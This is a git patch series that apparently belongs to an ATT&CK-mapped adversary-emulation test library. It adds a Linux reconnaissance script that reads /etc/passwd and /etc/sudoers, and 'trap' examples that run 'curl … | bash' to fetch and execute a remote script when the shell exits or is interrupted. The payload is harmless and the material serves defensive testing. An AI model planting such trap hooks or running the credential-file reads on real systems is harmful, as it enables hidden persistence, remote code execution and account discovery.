From 80bdcf5f104b3642962e69c94bf64287c7f12f94 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Thu, 8 Feb 2018 17:31:39 -0600 Subject: [PATCH 1/3] Work in progress Linux discovery payload --- Linux/Payloads/Discovery.sh | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 Linux/Payloads/Discovery.sh diff --git a/Linux/Payloads/Discovery.sh b/Linux/Payloads/Discovery.sh new file mode 100644 index 00000000..d2d4394c --- /dev/null +++ b/Linux/Payloads/Discovery.sh @@ -0,0 +1,14 @@ +#! /bin/bash +cat /etc/*-release +uname -ar +ifconfig +cat /etc/resolv.conf +df -h +cat /etc/fstab +cat /etc/passwd +cat /etc/group +cat /etc/sudoers +last +yum list installed +chkconfig --list #works with RHEL/CentOS 6, not 7 +systemctl list-unit-files #works with RHEL/CentOS 7, not 6 \ No newline at end of file From bb5a0181f2c102bde796e068e947b455b1f84ea6 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Tue, 13 Feb 2018 15:10:47 -0600 Subject: [PATCH 2/3] Adding Persistence and Execution tests for Trap --- Linux/Execution/Trap.md | 14 ++++++++++++++ Linux/Payloads/echo-art-fish.sh | 2 ++ Linux/Persistence/Trap.md | 10 ++++++++++ Linux/README.md | 2 +- 4 files changed, 27 insertions(+), 1 deletion(-) create mode 100644 Linux/Execution/Trap.md create mode 100644 Linux/Payloads/echo-art-fish.sh create mode 100644 Linux/Persistence/Trap.md diff --git a/Linux/Execution/Trap.md b/Linux/Execution/Trap.md new file mode 100644 index 00000000..a3f0c63e --- /dev/null +++ b/Linux/Execution/Trap.md @@ -0,0 +1,14 @@ +# Trap + +MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154) + + + trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT + + exit + +After exiting the shell, the script will download and execute. + + trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' INT + +After sending a keyboard interrupt (CTRL+C) the script will download and execute. \ No newline at end of file diff --git a/Linux/Payloads/echo-art-fish.sh b/Linux/Payloads/echo-art-fish.sh new file mode 100644 index 00000000..15e6e8d0 --- /dev/null +++ b/Linux/Payloads/echo-art-fish.sh @@ -0,0 +1,2 @@ +#! /bin/bash +echo So long, and thanks for all the fish! > /tmp/art-fish.txt \ No newline at end of file diff --git a/Linux/Persistence/Trap.md b/Linux/Persistence/Trap.md new file mode 100644 index 00000000..cc3a46f4 --- /dev/null +++ b/Linux/Persistence/Trap.md @@ -0,0 +1,10 @@ +# Trap + +MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154) + + + trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT + + exit + +After exiting the shell, the script will download and execute. \ No newline at end of file diff --git a/Linux/README.md b/Linux/README.md index 74f77e48..4e0b6e4c 100644 --- a/Linux/README.md +++ b/Linux/README.md @@ -8,7 +8,7 @@ | Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | | Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| Trap | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | | Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | | Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | | | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication | From 03bcfd5c0433fe8de12bcc3e3e365a66fc27ba11 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Tue, 13 Feb 2018 15:13:32 -0600 Subject: [PATCH 3/3] Delete Discovery.sh --- Linux/Payloads/Discovery.sh | 14 -------------- 1 file changed, 14 deletions(-) delete mode 100644 Linux/Payloads/Discovery.sh diff --git a/Linux/Payloads/Discovery.sh b/Linux/Payloads/Discovery.sh deleted file mode 100644 index d2d4394c..00000000 --- a/Linux/Payloads/Discovery.sh +++ /dev/null @@ -1,14 +0,0 @@ -#! /bin/bash -cat /etc/*-release -uname -ar -ifconfig -cat /etc/resolv.conf -df -h -cat /etc/fstab -cat /etc/passwd -cat /etc/group -cat /etc/sudoers -last -yum list installed -chkconfig --list #works with RHEL/CentOS 6, not 7 -systemctl list-unit-files #works with RHEL/CentOS 7, not 6 \ No newline at end of file